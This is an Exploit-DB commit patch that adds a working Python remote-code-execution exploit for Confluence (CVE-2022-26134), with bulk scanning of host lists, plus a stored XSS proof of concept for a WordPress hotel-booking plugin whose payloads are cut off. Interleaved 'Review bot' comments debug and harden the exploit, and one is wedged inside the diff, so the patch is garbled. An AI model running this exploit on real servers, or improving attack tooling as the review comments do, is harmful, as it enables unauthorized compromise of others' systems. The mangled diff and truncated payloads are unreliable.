From 5012842b97f4317dde2bc3ae2ebdbf6099607071 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 11 Jun 2022 05:01:58 +0000
Subject: [PATCH] DB: 2022-06-11

2 changes to exploits/shellcodes

WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
---
 exploits/java/webapps/50952.py | 110 +++++++++++++++++++++++++++++++++
 exploits/php/webapps/50951.txt | 17 +++++
 files_exploits.csv | 2 +
 3 files changed, 129 insertions(+)
 create mode 100755 exploits/java/webapps/50952.py
 create mode 100644 exploits/php/webapps/50951.txt

diff --git a/exploits/java/webapps/50952.py b/exploits/java/webapps/50952.py
new file mode 100755
index 000000000..92f57b540
--- /dev/null
+++ b/exploits/java/webapps/50952.py
@@ -0,0 +1,110 @@
+# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 06/006/2022
+# Exploit Author: h3v0x
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: All < 7.4.17 versions before 7.18.1
+# Tested on: -
+# CVE : CVE-2022-26134
+# https://github.com/h3v0x/CVE-2022-26134
+
+#!/usr/bin/python3
+
+import sys
+import requests
+import optparse
+import multiprocessing
+
+from requests.packages import urllib3
+from requests.exceptions import MissingSchema, InvalidURL
+urllib3.disable_warnings()
+
+requestEngine = multiprocessing.Manager()
+session = requests.Session()
+
+global paramResults
+paramResults = requestEngine.list()
+globals().update(locals())
+
+def spiderXpl(url):
+ globals().update(locals())
+ if not url.startswith('http'):
+ url='http://'+url
+
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
+ "Connection": "close",
+ "Accept-Encoding": "gzip, deflate"}
+
+ try:
+ response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
+ if(response.status_code == 302):
+ print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])
+
+ inputBuffer = str(response.headers['X-Cmd-Response'])
+ paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
+ else:
+ pass
+
+ except requests.exceptions.ConnectionError:
+ print('[x] Failed to Connect: '+url)
+ pass
+ except multiprocessing.log_to_stderr:
+ pass
+ except KeyboardInterrupt:
+ print('[!] 
Stoping exploit...')
+ exit(0)
+ except (MissingSchema, InvalidURL):
+ pass
+
+
+def banner():
+ print('[-] CVE-2022-26134')
+ print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')
+
+
+def main():
+ banner()
+
+ globals().update(locals())
+
+ sys.setrecursionlimit(100000)
+
+ if not optionsOpt.filehosts:
+ url = optionsOpt.url
+ spiderXpl(url)
+ else:
+ f = open(optionsOpt.filehosts)
+ urls = map(str.strip, f.readlines())
+
+ multiReq = multiprocessing.Pool(optionsOpt.threads_set)
+ try:
+ multiReq.map(spiderXpl, urls)
+ multiReq.close()
+ multiReq.join()
+ except UnboundLocalError:
+ pass
+ except KeyboardInterrupt:
+ exit(0)
+
+
+ if optionsOpt.output:
+ print("\n[!] Saving the output result in: %s" % optionsOpt.output)
+
+ with open(optionsOpt.output, "w") as f:
+ for result in paramResults:
+ f.write("%s\n" % result)
+ f.close()
+
+if __name__ == "__main__":
+ parser = optparse.OptionParser()
+
+ parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
+ parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
+ parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)
+ parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)
+ parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
+ parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
+ optionsOpt, args = parser.parse_args()
+
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50951.txt b/exploits/php/webapps/50951.txt
new file mode 100644
index 000000000..e8cf3cff8
--- /dev/null
+++ b/exploits/php/webapps/50951.txt
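Review bot: `except multiprocessing.log_to_stderr:` in spiderXpl names a function rather than an exception class, so any error the ConnectionError clause does not catch — for instance the KeyError from `response.headers['X-Cmd-Response']` when a host answers 302 without that header, as a redirect to a login page would — is converted into `TypeError: catching classes that do not inherit from BaseException is not allowed` and aborts that pool task. The `-m/--maxtimeout` value is parsed into `optionsOpt.timeout` but never handed to `requests.get`, so an unresponsive host blocks a worker indefinitely. The `-c` command is also spliced raw into the request path, so a command containing `#`, `?` or `%` is mangled before it reaches the OGNL expression; `quote(optionsOpt.command, safe='')` (with `from urllib.parse import quote` added to the imports) keeps the URL layer intact, though a literal `"` would still need escaping inside the OGNL string literal. Dropping the bogus clause, reading the header with `.get()` and passing the timeout gives the request block below.
```python
def spiderXpl(url):
    # … unchanged: scheme prefix and headers dict …
    try:
        response = requests.get(
            url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + quote(optionsOpt.command, safe='') + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/',
            headers=headers, verify=False, allow_redirects=False,
            timeout=optionsOpt.timeout)
        # A 302 without the header is a redirect (login, patched host), not a hit.
        cmd_output = response.headers.get('X-Cmd-Response')
        if response.status_code == 302 and cmd_output is not None:
            print('Found: ' + url + ' // ' + cmd_output)
            paramResults.append('Vulnerable application found:' + url + '\n' 'Command result:' + cmd_output + '\n')
    except requests.exceptions.ConnectionError:
        print('[x] Failed to Connect: ' + url)
    except requests.exceptions.Timeout:
        print('[x] Timed out: ' + url)
    # … unchanged: KeyboardInterrupt and (MissingSchema, InvalidURL) clauses …
```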
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
+# Date: 2022-06-05
+# Exploit Author: Sanjay Singh
+# Vendor Homepage: https://motopress.com/
+# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
+# Version: 4.2.4
+# Tested on: Windows/XAMPP
+###########################################################################
+PoC:
+
+1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
+2. Click on "Add Accommodation Type".
+3. Add title payload= ">
+4. Excerpt input payload ">
+5. Click publish.
+6. Visit http://localhost/accommodations/
+7. XSS payload execute.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 43763f8c4..8585cecdc 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -45013,3 +45013,5 @@ id,file,description,date,author,type,platform,port
 50944,exploits/php/webapps/50944.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)",1970-01-01,RedHatAugust,webapps,php,
 50945,exploits/php/webapps/50945.tzt,"Contao 4.13.2 - Cross-Site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
 50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php,
+50951,exploits/php/webapps/50951.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Sanjay Singh",webapps,php,
+50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",1970-01-01,"Fellipe Oliveira",webapps,java,
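Review bot: The payload in steps 3 and 4 is truncated — both lines stop at `">` with nothing after it, so the PoC as committed cannot be reproduced. The markup that followed the closing quote appears to have been stripped somewhere between the author's submission and this file; it should be restored before publication, since the `">` prefix alone only shows that the title and excerpt break out of an attribute. The write-up also does not say which WordPress role is needed to reach `edit.php?post_type=mphb_room_type` and publish an accommodation type, which decides how serious a stored XSS that later fires on the public `/accommodations/` page is; a line such as `# Privileges required: a user allowed to create Accommodation Types (role to be confirmed)` would let readers judge that.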